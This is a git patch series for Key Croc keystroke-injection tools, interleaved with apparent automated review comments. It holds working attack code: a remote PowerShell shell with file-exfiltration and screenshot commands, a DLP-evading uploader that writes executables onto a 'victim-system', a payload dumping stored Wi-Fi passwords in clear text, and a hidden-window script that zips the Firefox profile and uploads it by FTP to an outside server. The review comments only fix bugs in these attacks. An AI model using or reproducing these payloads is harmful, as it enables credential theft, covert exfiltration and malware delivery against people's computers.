From 0e67acc58c058b4ac02b9a014cc4926ea086b624 Mon Sep 17 00:00:00 2001
From: mark-b1980
Date: Fri, 12 May 2023 21:55:39 +0200
Subject: [PATCH 01/13] 1st version crocshell
---
 tools/crocshell_via_storage.py | 90 ++++++++++++++++++++++++++++++++++
 1 file changed, 90 insertions(+)
 create mode 100644 tools/crocshell_via_storage.py
diff --git a/tools/crocshell_via_storage.py b/tools/crocshell_via_storage.py
new file mode 100644
index 0000000..d46e5f1
--- /dev/null
+++ b/tools/crocshell_via_storage.py
@@ -0,0 +1,90 @@ +#!/usr/bin/env python +import os, time, codecs + +def init_ps(): + os.system("rm /root/udisk/out.txt.* > /dev/null 2>&1") + os.system("ATTACKMODE HID STORAGE > /dev/null 2>&1") + time.sleep(3) + + os.system("QUACK GUI r") + time.sleep(2) + + os.system("QUACK STRING powershell.exe") + os.system("QUACK ENTER") + time.sleep(2) + + os.system('QUACK STRING "\$cr0cp4th1387b=Join-Path -Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root -ChildPath \"out.txt\""') + os.system("QUACK ENTER") + time.sleep(1) + + +# SETTING UP THE SHELL +print "Starting the shell ..." +init_ps() + +# SHELL +ctr = 0 +cmd = "" +while True: + cmd = raw_input("CrocSHELL> ").strip() + + if cmd == "exit": + break + + elif cmd[0:5] == "exfil": + cmd = cmd.replace("exfil", "cp") + " (Split-Path $cr0cp4th1387b -Parent)" + + elif cmd == "peek": + cmd = "Start-Sleep -Seconds 2; " + cmd += "Add-Type -AssemblyName System.Windows.Forms; " + cmd += "$screen = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds; " + cmd += "$image = New-Object System.Drawing.Bitmap($screen.Width, $screen.Height); " + cmd += "$graphic = [System.Drawing.Graphics]::FromImage($image); " + cmd += "$point = New-Object System.Drawing.Point(0, 0); " + cmd += "$graphic.CopyFromScreen($point, $point, $image.Size); " + cmd += "$cursorBounds = New-Object System.Drawing.Rectangle([System.Windows.Forms.Cursor]::Position, [System.Windows.Forms.Cursor]::Current.Size); " + cmd += "[System.Windows.Forms.Cursors]::Default.Draw($graphic, $cursorBounds); " + cmd += "$p = Join-Path -Path (Split-Path $cr0cp4th1387b -Parent) -ChildPath screenshot_"+str(ctr+1)+".jpg; " + cmd += "$image.Save(\"$p\", [System.Drawing.Imaging.ImageFormat]::Png); " + + cmd = cmd.replace("$", "\\$").replace('"', '\\\"') + os.system('QUACK STRING "'+cmd+'"') + os.system("QUACK ENTER") + os.system("QUACK GUI DOWN") + time.sleep(5) + os.system("QUACK ALT TAB") + + cmd = "echo \"$p ... 
saved\" " + + elif cmd == "help": + print "\n AVAILABLE COMMANDS:\n-------------------" + print "exit .... End shell \nexfil ... Exfiltrate file - e.g.: exfil my_secret_passwords.docx \npeek .... Take a screenshot" + print "" + continue + + ctr += 1 + cmd = cmd.replace("$", "\\$").replace('"', '\\\"')+' | Out-File \\\"\$cr0cp4th1387b.'+str(ctr)+'\\\"; echo \\\"%%%DONE%%%\\\" >> \\\"\$cr0cp4th1387b.'+str(ctr)+'\\\"' + + os.system('QUACK STRING "'+cmd+'"') + os.system("QUACK ENTER") + + outp = "" + while not "%%%DONE%%%" in outp: + time.sleep(1) + f = open("/root/udisk/out.txt."+str(ctr), "r") + outp = f.read() + outp = outp.decode("UTF-16") + outp = outp.encode("UTF-8") + f.close() + + end = outp.index("%%%DONE%%%") + outp = outp[0:end].replace("\r", "").strip() + + print outp + + +# CLEANING UP +os.system('QUACK STRING "'+cmd+'"') +os.system("QUACK ENTER") +os.system("ATTACKMODE HID > /dev/null 2>&1") + From fa4639626e3306deefa9eab4ce8098aea98e49ec Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Fri, 12 May 2023 21:56:29 +0200 Subject: [PATCH 02/13] removed senceless import --- tools/crocshell_via_storage.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/crocshell_via_storage.py b/tools/crocshell_via_storage.py index d46e5f1..cf3324e 100644 --- a/tools/crocshell_via_storage.py +++ b/tools/crocshell_via_storage.py @@ -1,5 +1,5 @@ #!/usr/bin/env python -import os, time, codecs +import os, time def init_ps(): os.system("rm /root/udisk/out.txt.* > /dev/null 2>&1") From 90819a74c47129087705333b0a3b549e6e47b158 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Fri, 12 May 2023 22:13:58 +0200 Subject: [PATCH 03/13] Added readme-file --- tools/README.md | 68 +++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 tools/README.md diff --git a/tools/README.md b/tools/README.md new file mode 100644 index 0000000..6668e0f --- /dev/null +++ b/tools/README.md 
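Review bot: The read-back loop (`while not "%%%DONE%%%" in outp`) opens `/root/udisk/out.txt.<ctr>` every second with no existence check and no upper bound, so if the typed PowerShell line never reaches `Out-File` (parse error, wrong volume, window not focused) the `open()` raises an uncaught IOError and the shell exits, or it polls forever when the file exists but the sentinel never arrives. An empty input line is one such case: after `strip()` an empty `cmd` still gets `' | Out-File ...'` appended, which PowerShell rejects as a whole statement, so nothing is ever written; `if not cmd: continue` ahead of the `exit` test avoids it, and the read itself should be `with open(...)` inside `try/except IOError` with a retry limit. The module is Python 2 only (`print` statement, `raw_input`, `str.decode`) under a plain `#!/usr/bin/env python` shebang, which a module docstring should state. In the `exfil` branch `cmd.replace("exfil", "cp")` also rewrites the substring inside a file name; `"cp" + cmd[5:]` is the edit that was meant.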
@@ -0,0 +1,68 @@ +# Key Croc Tools + +### Croc Shell + +Allows the Croc to establish a reverse-shell on air-gapped systems. The Croc will act in `ATTACKMODE HID STORAGE` to collect the output of the commands and loot. + + root@croc:~# python udisk/tools/crocshell_via_storage.py + Starting the shell ... + CrocSHELL> D: + + CrocSHELL> ls + Verzeichnis: D:\ + + + Mode LastWriteTime Length Name + ---- ------------- ------ ---- + d----- 19.01.2023 09:32 000_BreachCompilation + d----- 03.12.2022 22:36 3CX + d----- 26.01.2022 08:09 Blog + d----- 03.04.2022 12:26 Combs_1 + d----- 25.01.2022 15:29 DFL + d----- 26.01.2022 00:30 DFLTask + d----- 10.02.2022 13:39 Honor 8S + d----- 23.10.2016 08:52 plaso-1.5.1 + d----- 26.01.2022 07:53 ZZZ_FONTS + -a---- 04.05.2023 09:57 487556 173.jpg + -a---- 04.05.2023 10:12 206541 173.mp3 + -a---- 04.05.2023 13:44 1415029 173.mp4 + -a---- 25.01.2023 20:11 5050 banner.txt + -a---- 17.02.2022 14:08 1994995712 paladin_edge_64.iso + -a---- 03.07.2022 09:27 1577592 WordRepair.exe + CrocSHELL> L: + + CrocSHELL> ls + Verzeichnis: L:\ + + + Mode LastWriteTime Length Name + ---- ------------- ------ ---- + d----- 14.07.2021 12:14 CDFE + d----- 12.01.2022 16:12 CDFP + d----- 13.08.2020 08:33 DFL Manuals + d----- 20.03.2020 14:01 JPG_Hi_Res + d----- 10.06.2021 18:38 PaWASP + d----- 11.02.2023 13:50 UnFOUNDchk + ------ 21.08.2021 20:06 126205 20210821_200626_FLASH_25010.dat.gz + ------ 20.10.2020 15:35 90539 5c21487e-3812-4498-b66a-eafe679bc4c8.jpg + ------ 01.04.2021 11:16 144368 7a39a04273-9fc4-4e18-b256-9c489b9c6a1c.jpeg + ------ 01.04.2021 11:16 128311 7a61adbd-8e52-4bad-9203-fc842d4069d2.jpeg + ------ 04.11.2020 18:52 627966 hddsuperclone_2.2.18-1_amd64.deb + ------ 27.04.2023 15:33 70553 PawnP1_01.png + ------ 27.04.2023 15:51 19861 Pawnp1_02.png + + CrocSHELL> peek + E:\screenshot_5.jpg ... saved + + CrocSHELL> exfil PawnP1_01.png + + CrocSHELL> help + + AVIALABLE COMMANDS: + -------------------- + exit .... End shell + exfil ... 
Exfiltrate file - e.g.: exfil my_secret_passwords.docx + peek .... Take a screenshot + + CrocSHELL> exit + root@croc:~# \ No newline at end of file From 42ed9a05071ca519c3c02b735e40509269ff7d81 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Sat, 13 May 2023 09:49:55 +0200 Subject: [PATCH 04/13] Added prevent sleep-mode script --- tools/README.md | 21 ++++++++++++++++++++- tools/prevent_sleep.py | 11 +++++++++++ 2 files changed, 31 insertions(+), 1 deletion(-) create mode 100644 tools/prevent_sleep.py diff --git a/tools/README.md b/tools/README.md index 6668e0f..8e6f391 100644 --- a/tools/README.md +++ b/tools/README.md @@ -65,4 +65,23 @@ Allows the Croc to establish a reverse-shell on air-gapped systems. The Croc wil peek .... Take a screenshot CrocSHELL> exit - root@croc:~# \ No newline at end of file + root@croc:~# + +### Prevent the system to go to sleep + +Sends a `SHIFT` keypress each 55 seconds if there is no keyboard activity + + root@croc:~# python udisk/tools/prevent_sleep.py + Sending SHIFT keypress for the 1. time! + Sending SHIFT keypress for the 2. time! + ... + Sending SHIFT keypress for the 897. time! + ^C + root@croc:~# + +You can also run the command in background and log out + + root@croc:~# python udisk/tools/prevent_sleep.py & + [1] 9219 + root@croc:~# + diff --git a/tools/prevent_sleep.py b/tools/prevent_sleep.py new file mode 100644 index 0000000..a4dee07 --- /dev/null +++ b/tools/prevent_sleep.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python +import os, time + +ctr = 0 +while True: + ctr += 1 + os.system("WAIT_FOR_KEYBOARD_INACTIVITY > /dev/null 2>&1") + print "Sending SHIFT keypress for the " + str(ctr) + ". time!" + os.system("QUACK SHIFT") + time.sleep(50) + From 6bb9f2f1841136587ca62ee68b0edc90411d79bf Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Sat, 13 May 2023 09:52:04 +0200 Subject: [PATCH 05/13] Adjusted timing --- tools/README.md | 2 +- tools/prevent_sleep.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
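Review bot: In `prevent_sleep.py` the exit status of `os.system("WAIT_FOR_KEYBOARD_INACTIVITY > /dev/null 2>&1")` is discarded, so if that helper is missing or fails the loop falls straight through and types `SHIFT` every 50 seconds regardless of user activity, with the error hidden by the stderr redirect; check it, e.g. `if os.system("WAIT_FOR_KEYBOARD_INACTIVITY > /dev/null 2>&1") != 0: break`. The README added in the same commit says the keypress is sent every 55 seconds while the code sleeps 50; the two should agree. Like the other tools in this series the script is Python 2 only (`print` statement) under a `#!/usr/bin/env python` shebang, which is worth a one-line comment at the top.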
diff --git a/tools/README.md b/tools/README.md index 8e6f391..571aa68 100644 --- a/tools/README.md +++ b/tools/README.md @@ -69,7 +69,7 @@ Allows the Croc to establish a reverse-shell on air-gapped systems. The Croc wil ### Prevent the system to go to sleep -Sends a `SHIFT` keypress each 55 seconds if there is no keyboard activity +Sends a `SHIFT` keypress each 50 seconds if there is no keyboard activity root@croc:~# python udisk/tools/prevent_sleep.py Sending SHIFT keypress for the 1. time! diff --git a/tools/prevent_sleep.py b/tools/prevent_sleep.py index a4dee07..6b0d135 100644 --- a/tools/prevent_sleep.py +++ b/tools/prevent_sleep.py @@ -7,5 +7,5 @@ os.system("WAIT_FOR_KEYBOARD_INACTIVITY > /dev/null 2>&1") print "Sending SHIFT keypress for the " + str(ctr) + ". time!" os.system("QUACK SHIFT") - time.sleep(50) + time.sleep(45) From 9160c36d623de031ab7bd78bebd421ffff3274e0 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Sun, 14 May 2023 15:47:20 +0200 Subject: [PATCH 06/13] Added file-uploader script --- tools/README.md | 11 ++++++++ tools/fileupload_via_quack.py | 51 +++++++++++++++++++++++++++++++++++ 2 files changed, 62 insertions(+) create mode 100644 tools/fileupload_via_quack.py diff --git a/tools/README.md b/tools/README.md index 571aa68..bf1f20e 100644 --- a/tools/README.md +++ b/tools/README.md @@ -85,3 +85,14 @@ You can also run the command in background and log out [1] 9219 root@croc:~# +### Upload files without network or storage interactions + +This allow you to upload a file without triggering many DLP systems + + root@croc:~/udisk/tools# python fileupload_via_quack.py bob.exe "D:\Z1.exe" + OPENING powershell.exe + SENDING CHUNK 1 / 481 ... DONE + SENDING CHUNK 2 / 481 ... DONE + ... + SENDING CHUNK 481 / 481 ... DONE + DONE IN 1727.92612386 SEC. \ No newline at end of file diff --git a/tools/fileupload_via_quack.py b/tools/fileupload_via_quack.py new file mode 100644 index 0000000..53adf32 --- /dev/null +++ b/tools/fileupload_via_quack.py 
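Review bot: The README now says 50 seconds while `prevent_sleep.py` sleeps 45 in the same commit, so documentation and code are out of step again; pick one value and quote it in both places. The number is also not the period between keypresses, because `WAIT_FOR_KEYBOARD_INACTIVITY` presumably blocks before the sleep; a README sentence such as `Sends a SHIFT keypress after 45 seconds once the keyboard has gone idle` would describe the loop more honestly.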
@@ -0,0 +1,51 @@ +#!/usr/bin/env python +import base64 +import time +import sys +import os + +chunk_size = 1500 +start = time.time() + +def usage(): + print "\nUSAGE:\n------\n{os.path.basename(__file__)} [LOCAL FILEPATH] [REMOTE FILEPATH]\n" + quit() + +# CHECK CMD-LINE ARGS +if len(sys.argv) != 3: + usage() +else: + file = sys.argv[1] + remote = sys.argv[2].replace("\\", "\\\\") + +with open(file, "rb") as f: + data = f.read() + b64 = base64.b64encode(data).decode("UTF-8") + +# Split into Base64 encoded string into chunks +chunks = [b64[i:i+chunk_size] for i in range(0, len(b64), chunk_size)] + +# Open powershell +print "OPENING powershell.exe" +os.system("QUACK GUI r") +time.sleep(1.5) +os.system("QUACK STRING powershell.exe") +os.system("QUACK ENTER") +time.sleep(1.5) + +# Run upload +os.system('QUACK STRING \$b=\\"\\"') +os.system('QUACK ENTER') + +max = len(chunks) +ctr = 0 +for chunk in chunks: + ctr += 1 + os.system('QUACK STRING \$b+=\\"'+chunk+'\\"') + os.system('QUACK ENTER') + print "SENDING CHUNK "+str(ctr)+" / "+str(max)+" ... DONE" + +# Write file on victim-system +os.system('QUACK STRING [IO.File]::WriteAllBytes\(\\"'+remote+'\\", [Convert]::FromBase64String\(\$b\)\)\\; exit\\;') +os.system('QUACK ENTER') +print "DONE IN "+str(time.time() - start)+" SEC." From eba1ed321ac088f2201e5f5a0a4796b16be7d2ca Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Mon, 15 May 2023 09:17:02 +0200 Subject: [PATCH 07/13] Added autoconfig payload --- .../WLAN_autoconfig/autoconfig_croc.txt | 53 +++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt diff --git a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt new file mode 100644 index 0000000..5a8db61 --- /dev/null +++ b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt 
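Review bot: `usage()` prints `{os.path.basename(__file__)}` literally — the string is not an f-string (and the file is Python 2, see the `print` statement), so the placeholder is never substituted; use `"...%s..." % os.path.basename(__file__)` or `.format(...)`. `quit()` there is the interactive `site` helper; `sys.exit(1)` is the conventional call for a usage error and also returns a non-zero status. `file` and `max` shadow builtins; `path` and `total` would do. The remote path taken from `sys.argv[2]` is spliced unquoted into the `os.system` command string, so a path containing spaces or shell metacharacters is split or interpreted by the Croc's shell before anything is typed; `subprocess` with an argument list, or at least `pipes.quote` (`shlex.quote` on Python 3), keeps the argument intact.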
@@ -0,0 +1,53 @@ +# Title: Croc_Autoconfig +# Description: Exfiltrate keyboard-layout and WIFI configuration from target +# and set config.txt accordingly +# Author: MarkB +# Version: 1.0 +# Category: Key Croc + +# Config parameters +name_line=11 +pass_line=33 + +# ATTACK SCRIPT +ATTACKMODE STORAGE HID +Q DELAY 8000 +LED ATTACK +Q GUI r +Q DELAY 1500 +Q STRING powershell.exe +Q ENTER +Q DELAY 1500 + +# Get actual WIFI configuration +Q STRING "netsh wlan show profile name=(Get-NetConnectionProfile).Name[0] key=clear | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root \"WLAN.txt\")" +Q ENTER +Q DELAY 3000 + +# Get keyboard layout +Q STRING "(Get-Culture).Name | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root \"KEYBOARD.txt\")" +Q ENTER +Q DELAY 1000 + +# Close powershell +Q STRING exit +Q ENTER + + +# Parse Data and create config.txt +ATTACKMODE HID +LED Y +name=`head -$name_line WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` +pass=`head -$pass_line WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` +lang=`cat KEYBOARD.txt | cut -d "-" -f 2` + +echo "DUCKY_LANG $lang" > /root/udisk/config.txt +echo "WIFI_SSID $name" >> /root/udisk/config.txt +echo "WIFI_PASS $pass" >> /root/udisk/config.txt +echo "SSH ENABLE" >> /root/udisk/config.txt + +# Deactivate payload, cleanup and reboot +mv /root/udisk/payloads/autoconfig_croc.txt /root/udisk/library/examples/ +rm /root/udiks/WLAN.txt +rm /root/udisk/KEYBOARD.txt +LED G \ No newline at end of file From 7c1260aef52a2119ef45030f6067846aeb06ca22 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Mon, 15 May 2023 09:53:28 +0200 Subject: [PATCH 08/13] working version --- .../WLAN_autoconfig/autoconfig_croc.txt | 38 +++++++++---------- 1 file changed, 19 insertions(+), 19 deletions(-) 
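Review bot: The cleanup step `mv /root/udisk/payloads/autoconfig_croc.txt /root/udisk/library/examples/` assumes the target directory exists; if it does not, `mv` fails, the payload stays in the payloads folder and presumably runs again the next time the device is plugged in (the README added in patch 10 asks the user to create the directory by hand). `mkdir -p /root/udisk/library/examples` before the `mv`, or `mv ... || rm /root/udisk/payloads/autoconfig_croc.txt`, removes that dependency; the same lines survive unchanged in the patch 08 and patch 09 hunks. The header comment should also state what is persisted in plaintext: `config.txt` receives `WIFI_PASS` as recovered, and `WLAN.txt` holds the full `key=clear` output on the exported volume until the final `rm`.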
diff --git a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt
index 5a8db61..0e2ad25 100644
--- a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt
+++ b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt
@@ -11,35 +11,35 @@ pass_line=33 # ATTACK SCRIPT ATTACKMODE STORAGE HID -Q DELAY 8000 +sleep 5 LED ATTACK -Q GUI r -Q DELAY 1500 -Q STRING powershell.exe -Q ENTER -Q DELAY 1500 +QUACK GUI r +sleep 2 +QUACK STRING powershell.exe +QUACK ENTER +sleep 2 # Get actual WIFI configuration -Q STRING "netsh wlan show profile name=(Get-NetConnectionProfile).Name[0] key=clear | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root \"WLAN.txt\")" -Q ENTER -Q DELAY 3000 +QUACK STRING "netsh wlan show profile name=(Get-NetConnectionProfile).Name[0] key=clear | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root \"WLAN.txt\")" +QUACK ENTER +sleep 5 # Get keyboard layout -Q STRING "(Get-Culture).Name | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root \"KEYBOARD.txt\")" -Q ENTER -Q DELAY 1000 +QUACK STRING "(Get-Culture).Name | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root \"KEYBOARD.txt\")" +QUACK ENTER +sleep 2 # Close powershell -Q STRING exit -Q ENTER +QUACK STRING exit +QUACK ENTER # Parse Data and create config.txt -ATTACKMODE HID +#ATTACKMODE HID LED Y -name=`head -$name_line WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` -pass=`head -$pass_line WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` -lang=`cat KEYBOARD.txt | cut -d "-" -f 2` +name=`head -$name_line /root/udisk/WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` +pass=`head -$pass_line /root/udisk/WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` +lang=`cat /root/udisk/KEYBOARD.txt | cut -d "-" -f 2` echo "DUCKY_LANG $lang" > /root/udisk/config.txt echo "WIFI_SSID $name" >> /root/udisk/config.txt 
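Review bot: Commenting out `ATTACKMODE HID` leaves the device in `HID STORAGE` while the shell half parses `/root/udisk/WLAN.txt` and rewrites `/root/udisk/config.txt`; since that path appears to be the same volume PowerShell writes to over USB (the `Set-Content` lines target the `KeyCroc`-labelled volume and the shell reads the result back from `/root/udisk`), the Croc and the host are then writing one filesystem concurrently, and the Croc side may not even see the host's writes until the volume is re-exported — patch 09 restores `ATTACKMODE HID` before the parse, which is the right order. Independently, nothing checks that `WLAN.txt` exists and is non-empty after the fixed `sleep 5`: `head` on a missing file yields empty `$name`/`$pass`, and the unconditional `echo ... > /root/udisk/config.txt` then replaces the working configuration with blank `WIFI_SSID`/`WIFI_PASS` lines. A `[ -s /root/udisk/WLAN.txt ] || exit 1` guard before the parse prevents that; the `-n` test patch 09 adds covers only `$lang` and should be extended to `$name` and `$pass`.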
@@ -48,6 +48,6 @@ echo "SSH ENABLE" >> /root/udisk/config.txt # Deactivate payload, cleanup and reboot mv /root/udisk/payloads/autoconfig_croc.txt /root/udisk/library/examples/ -rm /root/udiks/WLAN.txt +rm /root/udisk/WLAN.txt rm /root/udisk/KEYBOARD.txt LED G \ No newline at end of file From f5a1427deae70685e0a3ed43d59705dadb6786d7 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Mon, 15 May 2023 12:23:18 +0200 Subject: [PATCH 09/13] All woring just not the reboot --- .../credentials/WLAN_autoconfig/README.md | 1 + .../WLAN_autoconfig/autoconfig_croc.txt | 28 +++++++++++-------- .../credentials/WLAN_autoconfig/dummy.txt | 2 ++ 3 files changed, 20 insertions(+), 11 deletions(-) create mode 100644 payloads/library/credentials/WLAN_autoconfig/README.md create mode 100644 payloads/library/credentials/WLAN_autoconfig/dummy.txt diff --git a/payloads/library/credentials/WLAN_autoconfig/README.md b/payloads/library/credentials/WLAN_autoconfig/README.md new file mode 100644 index 0000000..ef94a7b --- /dev/null +++ b/payloads/library/credentials/WLAN_autoconfig/README.md @@ -0,0 +1 @@ +# Autoconfiguration payload diff --git a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt index 0e2ad25..a5d7f4e 100644 --- a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt +++ b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt @@ -10,7 +10,8 @@ name_line=11 pass_line=33 # ATTACK SCRIPT -ATTACKMODE STORAGE HID +sleep 10 +ATTACKMODE HID STORAGE sleep 5 LED ATTACK QUACK GUI r 
@@ -35,19 +36,24 @@ QUACK ENTER # Parse Data and create config.txt -#ATTACKMODE HID LED Y -name=`head -$name_line /root/udisk/WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` -pass=`head -$pass_line /root/udisk/WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` -lang=`cat /root/udisk/KEYBOARD.txt | cut -d "-" -f 2` - -echo "DUCKY_LANG $lang" > /root/udisk/config.txt -echo "WIFI_SSID $name" >> /root/udisk/config.txt -echo "WIFI_PASS $pass" >> /root/udisk/config.txt -echo "SSH ENABLE" >> /root/udisk/config.txt +ATTACKMODE HID +sleep 2 +name=$(head -$name_line /root/udisk/WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g') +pass=$(head -$pass_line /root/udisk/WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g') +lang=$(cat /root/udisk/KEYBOARD.txt | cut -d "-" -f 2) + +if [ ! -z "$lang" ] +then + echo "DUCKY_LANG $lang" > /root/udisk/config.txt + echo "WIFI_SSID $name" >> /root/udisk/config.txt + echo "WIFI_PASS $pass" >> /root/udisk/config.txt + echo "SSH ENABLE" >> /root/udisk/config.txt +fi # Deactivate payload, cleanup and reboot mv /root/udisk/payloads/autoconfig_croc.txt /root/udisk/library/examples/ rm /root/udisk/WLAN.txt rm /root/udisk/KEYBOARD.txt -LED G \ No newline at end of file +LED G FAST +shutdown -r now \ No newline at end of file diff --git a/payloads/library/credentials/WLAN_autoconfig/dummy.txt b/payloads/library/credentials/WLAN_autoconfig/dummy.txt new file mode 100644 index 0000000..91c29e4 --- /dev/null +++ b/payloads/library/credentials/WLAN_autoconfig/dummy.txt @@ -0,0 +1,2 @@ +# DUMMY-file needed to be in payloads-folder with version 1.3 that the payload execute propperly +# maybe not needed with newer versions! \ No newline at end of file From 95d0da7a71ab6b3e2156a15314d01d63ec4dd5e2 Mon Sep 17 00:00:00 2001 
From: mark-b1980 Date: Tue, 16 May 2023 00:09:57 +0200 Subject: [PATCH 10/13] Exfiltrate Firefox Profile Payload --- .../credentials/WLAN_autoconfig/README.md | 14 +++++ .../WLAN_autoconfig/autoconfig_croc.txt | 4 +- .../Exfiltrate_Firefox_Profile.txt | 51 +++++++++++++++++++ .../Exfiltrate_Firefox_Profile/README.md | 7 +++ .../Exfiltrate_Firefox_Profile/dummy.txt | 2 + 5 files changed, 76 insertions(+), 2 deletions(-) create mode 100644 payloads/library/exfiltration/Exfiltrate_Firefox_Profile/Exfiltrate_Firefox_Profile.txt create mode 100644 payloads/library/exfiltration/Exfiltrate_Firefox_Profile/README.md create mode 100644 payloads/library/exfiltration/Exfiltrate_Firefox_Profile/dummy.txt diff --git a/payloads/library/credentials/WLAN_autoconfig/README.md b/payloads/library/credentials/WLAN_autoconfig/README.md index ef94a7b..9939be9 100644 --- a/payloads/library/credentials/WLAN_autoconfig/README.md +++ b/payloads/library/credentials/WLAN_autoconfig/README.md @@ -1 +1,15 @@ # Autoconfiguration payload + +Starts in `ATTACKMODE HID STORAGE` and extracts with powershell commands SSID, password and keyboard-layout from the target system. + +Then the payload alters the `config.txt` and removes itself from the payloads directtory! **Attention:** the directory `/root/udisk/library/examples/` nust exist that the payload can move itself! + +The croc should automatically reboot but this don't work actually - so unplug and replug the croc when the LED start flashing green. + +In case another language-version of Windows will have SSID and password in other lines alter this 2 lines accordingly: + + # Config parameters + name_line=11 # Line-number which contains the SSID + pass_line=33 # Line-number which contains the password + +Happy hacking ;-) diff --git a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt index a5d7f4e..c7b418d 100644 
--- a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt +++ b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt @@ -6,8 +6,8 @@ # Category: Key Croc # Config parameters -name_line=11 -pass_line=33 +name_line=11 # Line-number which contains the SSID +pass_line=33 # Line-number which contains the password # ATTACK SCRIPT sleep 10 diff --git a/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/Exfiltrate_Firefox_Profile.txt b/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/Exfiltrate_Firefox_Profile.txt new file mode 100644 index 0000000..f3eb52e --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/Exfiltrate_Firefox_Profile.txt 
@@ -0,0 +1,51 @@ +# Title: Exfiltrate_Firefox_Profile +# Description: Exfiltrate Firefox Profile folder via +# FTP server +# Author: MarkB +# Version: 1.0 +# Category: Key Croc + +# Config parameters +serveradr="111.222.33.44" # Server IP or domain +username="ftpuser" # FTP username +password="secretpasswd" # FTP password + +# WRITE SRCIPT +sleep 10 +LED M +ATTACKMODE HID +QUACK GUI r +sleep 1 +QUACK STRING "notepad.exe" +QUACK ENTER +sleep 2 +QUACK STRING "Compress-Archive -Path \"\$(\$env:LOCALAPPDATA)\\Mozilla\\Firefox\\Profiles\\\" -CompressionLevel \"Fastest\" -DestinationPath \"\$(\$env:TEMP)\\ff.zip\"" +QUACK ENTER +QUACK STRING "\$client = New-Object System.Net.WebClient" +QUACK ENTER +QUACK STRING "\$client.Credentials = New-Object System.Net.NetworkCredential(\"$username\", \"$password\")" +QUACK ENTER +QUACK STRING "\$client.UploadFile(\"ftp://$serveradr/ff.zip\", \"\$(\$env:TEMP)\\ff.zip\")" +QUACK ENTER +QUACK STRING "rm \"\$(\$env:TEMP)\\ff.zip\"" +QUACK ENTER +QUACK STRING "rm \"\$(\$env:TEMP)\\e.ps1\"" +QUACK ENTER +QUACK CTRL s +sleep 1 +QUACK STRING "%TEMP%\\e.ps1" +QUACK TAB +QUACK DOWN +QUACK DOWN +QUACK ENTER +QUACK ENTER +sleep 1 +QUACK ALT F4 +sleep 1 + +# EXECUTE SCRIPT IN HIDDEN WINDOW +QUACK GUI r +sleep 1 +QUACK STRING "powershell.exe -windowstyle Hidden %TEMP%\\e.ps1" +QUACK ENTER +LED OFF \ No newline at end of file diff --git a/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/README.md b/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/README.md new file mode 100644 index 0000000..e1f22bf --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/README.md 
